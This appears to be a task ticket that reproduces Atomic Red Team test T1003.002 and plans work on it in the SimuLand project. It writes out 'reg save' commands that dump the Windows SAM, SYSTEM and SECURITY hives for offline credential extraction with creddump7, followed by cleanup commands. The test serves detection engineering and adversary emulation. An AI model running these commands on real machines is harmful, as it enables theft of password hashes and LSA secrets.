Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: Windows
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
Tasks:
Create an issue in SimuLand GitHub Repo with a request to run this atomic test
Start collaboration with contributors to SimuLand and make sure someone is assigned to the creation of the environment.
Close ticket and move it to done once the issue is create in the other project and someone is assigned to it
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Tasks: